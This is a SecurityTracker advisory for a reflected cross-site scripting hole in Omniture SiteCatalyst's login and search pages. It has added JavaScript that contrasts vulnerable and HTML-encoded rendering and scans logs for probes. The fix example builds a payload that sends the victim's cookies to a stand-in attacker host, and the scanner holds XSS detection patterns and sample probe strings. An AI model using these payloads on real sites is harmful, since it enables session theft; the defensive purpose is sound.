SecurityTracker.com
Category:   Application (Generic)  >   Adobe Analytics (Omniture SiteCatalyst) Vendors:   Omniture
Omniture SiteCatalyst Input Validation Hole in Login Page Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1017392
SecurityTracker URL:  http://securitytracker.com/id/1017392
CVE Reference:   CVE-2006-6640   (Links to External Site)
Updated:  Jan 26 2007
Original Entry Date:  Dec 18 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Doz from Hackers Center Security Group reported a vulnerability in Omniture SiteCatalyst. A remote user can conduct cross-site scripting attacks.

The web login page does not HTML-encode user-supplied input in the 'company' and 'username' parameters before reflecting it back into the page, so a crafted link (reflected cross-site scripting) can place arbitrary script in the response. When the target user follows the link, the script executes in the target user's browser. The code will originate from the site running the SiteCatalyst software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The search function ('search.asp', 'ss' parameter) is also affected.

Other related products may also be affected.
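To make the flaw concrete, the following is an added example (not Omniture's or the advisory's code) of a login page that reflects the 'company' and 'username' parameters named above, first the way the advisory describes it (raw concatenation into the HTML) and then with output encoding for the attribute context. The page layout, the '/login.asp' path and the host name are assumptions; only the parameter names come from the advisory.

```javascript
// Added example, not SiteCatalyst's own code. Parameter names 'company' and
// 'username' come from the advisory; the form layout and /login.asp path are assumed.

// Encode the five characters that can break out of HTML text or a quoted attribute.
function htmlEscape(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the reflected values are concatenated straight into attribute values.
function renderLoginVulnerable(params) {
  const company = params.company ?? "";
  const username = params.username ?? "";
  return (
    '<form method="post" action="/login.asp">' +
    '<input name="company" value="' + company + '">' +
    '<input name="username" value="' + username + '">' +
    '<input type="password" name="password">' +
    "</form>"
  );
}

// Fixed: every reflected value is HTML-encoded for the attribute context it lands in.
function renderLoginFixed(params) {
  const company = htmlEscape(params.company ?? "");
  const username = htmlEscape(params.username ?? "");
  return (
    '<form method="post" action="/login.asp">' +
    '<input name="company" value="' + company + '">' +
    '<input name="username" value="' + username + '">' +
    '<input type="password" name="password">' +
    "</form>"
  );
}

// Parse the query string of a login URL the way the server would receive it.
function parseQuery(url) {
  const u = new URL(url, "https://sitecatalyst.example.invalid"); // assumed host
  return Object.fromEntries(u.searchParams.entries());
}

// The template contains no <script> tag, so any present in the output came from input.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed attack URL: the payload closes the value attribute and the <input>
// tag, then injects a script that ships the SiteCatalyst cookies to an attacker host.
const attackUrl =
  "/login.asp?company=acme&username=" +
  encodeURIComponent('"><script>document.location="https://attacker.invalid/?c="+document.cookie</script>');

const params = parseQuery(attackUrl);
const vulnerableHtml = renderLoginVulnerable(params);
const fixedHtml = renderLoginFixed(params);

console.log("vulnerable:", vulnerableHtml);
console.log("script tags injected:", countScriptTags(vulnerableHtml)); // 1
console.log("fixed:", fixedHtml);
console.log("script tags injected:", countScriptTags(fixedHtml)); // 0
```

The hardened renderer encodes for a double-quoted HTML attribute, which is where these two values land. A value reflected into a different context (inside a script block, a URL, or CSS) needs the encoder for that context; HTML entity encoding alone does not make a JavaScript string literal safe.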

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SiteCatalyst software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has reportedly issued a fix.
Vendor URL:  www.omniture.com/ (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  SiteCatalyst Web Login Cross Site Vulnerabilities

Hackers Center Security Group (http://www.hackerscenter.com/)
Doz's Security Advisory


Desc: SiteCatalyst Web Login Cross Site Vulnerabilities
Risk: Medium





Omniture, Inc aims its aperture at your Web site. The company provides Internet 
analytic software and services to corporate customers such as AOL, eBay, General 
Motors, and Microsoft. Omniture's primary product, SiteCatalyst, helps clients 
electronically measure Web site traffic, visitor activity, advertising effectiveness, 
and e-commerce transactions. Other products include the Omniture Discover, Data, and 
SearchCenter line of products, designed to provide customers access to all of their 
data in real time.

Login and search engine scripts are affected

Vendor: www.omniture.com

Company Email: ir@omniture.com


Proof of concept:


/search.asp?ss=[XSS]


Many sites running Omniture Web tools are almost certainly vulnerable to cross-site 
scripting holes. We did some research and found that many big companies are using 
Omniture products (Microsoft included).


-- HSC Security Group
http://www.hackerscenter.com

Security researcher? Join us: mail Zinho at zinho at hackerscenter.com
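For a site that ran these scripts before the fix, the practical question is whether anyone probed them. The following is an added example (not part of the advisory) that flags attempts against the endpoints the advisory names: '/search.asp' with the 'ss' parameter from the proof of concept above, and the 'company' and 'username' login parameters from the description. The log lines are constructed in IIS W3C extended format; the '/login.asp' path and the exact field list are assumptions.

```javascript
// Added example, not from the advisory or the vendor. Detects reflected-XSS probes
// against the SiteCatalyst endpoints the advisory names, in constructed IIS W3C-style
// log lines. The /login.asp path and the "#Fields:" layout are assumptions.

// Endpoint -> parameters the advisory says are reflected without encoding.
const WATCHED = {
  "/search.asp": ["ss"],
  "/login.asp": ["company", "username"],
};

// Markers of an attempt to break into tag or script context.
const XSS_MARKERS = [
  /<\s*script/i,
  /javascript\s*:/i,
  /on(error|load|mouseover|focus)\s*=/i,
  /<\s*(img|svg|iframe|body)\b/i,
];

// Decode repeatedly so a double-encoded '<' (%253C) is still seen; stop when stable.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, " "));
    } catch {
      return current; // malformed escape: keep what we have rather than crash
    }
    if (next === current) return next;
    current = next;
  }
  return current;
}

// Parse an IIS W3C extended log: the "#Fields:" directive names the columns.
function parseW3cLog(text) {
  let fields = null;
  const rows = [];
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    if (line.startsWith("#Fields:")) {
      fields = line.slice("#Fields:".length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith("#") || !fields) continue;
    const cols = line.split(/\s+/);
    if (cols.length !== fields.length) continue; // truncated or malformed row
    rows.push(Object.fromEntries(fields.map((f, i) => [f, cols[i]])));
  }
  return rows;
}

// One hit per watched parameter whose decoded value carries an XSS marker.
function findXssProbes(logText) {
  const hits = [];
  for (const row of parseW3cLog(logText)) {
    const stem = (row["cs-uri-stem"] || "").toLowerCase();
    const watched = WATCHED[stem];
    if (!watched || !row["cs-uri-query"] || row["cs-uri-query"] === "-") continue;
    for (const pair of row["cs-uri-query"].split("&")) {
      const eq = pair.indexOf("=");
      const name = eq < 0 ? pair : pair.slice(0, eq);
      if (!watched.includes(name)) continue;
      const value = fullyDecode(eq < 0 ? "" : pair.slice(eq + 1));
      if (XSS_MARKERS.some((re) => re.test(value))) {
        hits.push({ ip: row["c-ip"], stem, param: name, value, status: row["sc-status"] });
      }
    }
  }
  return hits;
}

// Constructed sample log (not real traffic). The third request is double-encoded.
const SAMPLE_LOG = `#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-12-18 10:01:02 198.51.100.7 GET /search.asp ss=omniture+reports 200
2006-12-18 10:01:09 203.0.113.5 GET /search.asp ss=%3Cscript%3Ealert(document.cookie)%3C/script%3E 200
2006-12-18 10:01:15 203.0.113.5 GET /login.asp company=acme&username=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 200
2006-12-18 10:02:00 192.0.2.9 GET /login.asp company=acme&username=doz 200
2006-12-18 10:02:30 192.0.2.9 GET /report.asp id=%3Cscript%3E 404
`;

const probes = findXssProbes(SAMPLE_LOG);
for (const h of probes) {
  console.log(`${h.ip} ${h.stem}?${h.param}= ${JSON.stringify(h.value)} (HTTP ${h.status})`);
}
```

The decoder loop matters: a probe sent as `%253C` reaches the log as `%3C` after one decode by the server, and an IIS log records the query string as received, so a single decode would miss it. The marker list is deliberately short; in production it would be replaced by a maintained rule set, but the per-parameter scoping (only the fields the advisory says are reflected) is what keeps the false-positive rate usable.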

Copyright 2019, SecurityGlobal.net LLC